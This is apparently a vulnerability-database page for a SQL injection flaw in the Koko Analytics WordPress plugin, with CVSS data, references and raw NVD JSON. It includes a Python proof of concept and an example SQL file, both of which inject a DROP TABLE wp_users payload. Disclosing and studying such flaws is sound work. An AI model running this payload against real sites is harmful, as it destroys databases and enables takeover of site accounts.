CVE-2026-22850

Description

Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as "),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibericode:koko_analytics:*:*:*:*:*:wordpress:*:* - VULNERABLE

Koko Analytics < 2.1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-22850 PoC - SQL Injection via Tracking Endpoint
# Author: Security Research
# Target: Koko Analytics WordPress Plugin < 2.1.3

import requests
import urllib.parse

target_url = "http://target-wordpress-site.com/"

# Malicious payload to inject via tracking endpoint
# This payload attempts to break out of value list in export SQL
malicious_path = "'),('999','x');DROP TABLE wp_users;--"

# Step 1: Submit malicious data via public tracking endpoint
tracking_endpoint = f"{target_url}?koko-analytics-track=1"
params = {
    'pa': malicious_path,
    'r': 'https://attacker-controlled-site.com'
}

print("[*] Sending malicious payload to tracking endpoint...")
response = requests.get(tracking_endpoint, params=params)
print(f"[*] Response status: {response.status_code}")

# Step 2: If admin exports data and imports it, the DROP TABLE will execute
# The attacker can also directly upload a malicious .sql file if authenticated

# Example malicious SQL file content for direct upload:
exploit_sql = """-- Koko Analytics
INSERT INTO wp_koko_analytics_pages (id, pageview) VALUES (999, 'malicious');
DROP TABLE wp_users;
--"""

print("[*] PoC demonstrates SQL injection via tracking endpoint")
print("[*] When admin exports and imports, arbitrary SQL will execute")
print("[*] Mitigation: Upgrade to Koko Analytics >= 2.1.3")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22850
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22850
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22850/
[4] VulDB https://vuldb.com/cve/CVE-2026-22850
[5] https://drive.google.com/file/d/1HdQKf42prwrBUUG2CwbIkccTp2i6HR6d/view?usp=sharing
[6] https://github.com/ibericode/koko-analytics/commit/7b7d58f4a1838c8203cf4e7bb59847c982432119
[7] https://github.com/ibericode/koko-analytics/security/advisories/GHSA-jgfh-264m-xh3q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22850", "sourceIdentifier": "[email protected]", "published": "2026-01-19T17:15:50.430", "lastModified": "2026-03-09T21:16:44.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Koko Analytics is an open-source analytics plugin for WordPress. Versions prior to 2.1.3 are vulnerable to arbitrary SQL execution through unescaped analytics export/import and permissive admin SQL import. Unauthenticated visitors can submit arbitrary path (`pa`) and referrer (`r`) values to the public tracking endpoint in src/Resources/functions/collect.php, which stores those strings verbatim in the analytics tables. The admin export logic in src/Admin/Data_Export.php writes these stored values directly into SQL INSERT statements without escaping. A crafted path such as \"),('999','x');DROP TABLE wp_users;-- breaks out of the value list. When an administrator later imports that export file, the import handler in src/Admin/Data_Import.php reads the uploaded SQL with file_get_contents, performs only a superficial header check, splits on semicolons, and executes each statement via $wpdb->query with no validation of table names or statement types. Additionally, any authenticated user with manage_koko_analytics can upload an arbitrary .sql file and have it executed in the same permissive way. Combined, attacker-controlled input flows from the tracking endpoint into exported SQL and through the import execution sink, or directly via malicious uploads, enabling arbitrary SQL execution. In a worst-case scenario, attackers can achieve arbitrary SQL execution on the WordPress database, allowing deletion of core tables (e.g., wp_users), insertion of backdoor administrator accounts, or other destructive/privilege-escalating actions. Version 2.1.3 patches the issue."}, {"lang": "es", "value": "Koko Analytics es un plugin de análisis de código abierto para WordPress. Las versiones anteriores a la 2.1.3 son vulnerables a la ejecución arbitraria de SQL debido a la exportación/importación de datos analíticos sin escapar y a una importación de SQL administrativa poco restrictiva. Los visitantes no autenticados pueden enviar valores arbitrarios de ruta (`pa`) y de origen (`r`) al punto final de seguimiento público en src/Resources/functions/collect.php, que almacena esas cadenas tal cual en las tablas de análisis. La lógica de exportación de administración en src/Admin/Data_Export.php escribe estos valores almacenados directamente en sentencias SQL INSERT sin escapar. Una ruta manipulada como \"),(“999”,'x'); \"DROP TABLE wp_users;--\" se sale de la lista de valores. Cuando un administrador importa posteriormente ese archivo de exportación, el controlador de importación en src/Admin/Data_Import.php lee el SQL cargado con file_get_contents, realiza solo una comprobación superficial del encabezado, divide por puntos y coma, y ejecuta cada instrucción mediante $wpdb->query sin validar los nombres de las tablas ni los tipos de instrucción. Además, cualquier usuario autenticado con el permiso manage_koko_analytics puede subir un archivo .sql arbitrario y hacer que se ejecute de la misma manera permisiva. En conjunto, las entradas controladas por el atacante fluyen desde el punto final de seguimiento hacia el SQL exportado y a través del canal de ejecución de la importación, o directamente mediante subidas maliciosas, lo que permite la ejecución arbitraria de SQL. En el peor de los casos, los atacantes pueden ejecutar código SQL arbitrario en la base de datos de WordPress, lo que les permitiría eliminar tablas fundamentales (por ejemplo, wp_users), crear cuentas de administrador con puertas traseras o llevar a cabo otras acciones destructivas o de escalada de privilegios. La versión 2.1.3 corrige este problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibericode:koko_analytics:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.1.3", "matchCriteriaId": "CB3DC92C-231A-456F-A8CE-109A55F6F278"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1HdQKf42prwrBUUG2CwbIkccTp2i6HR6d/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Mitigation"]}, {"url": "https://github.com/ibericode/koko-analytics/commit/7b7d58f4a1838c8203cf4e ... (truncated)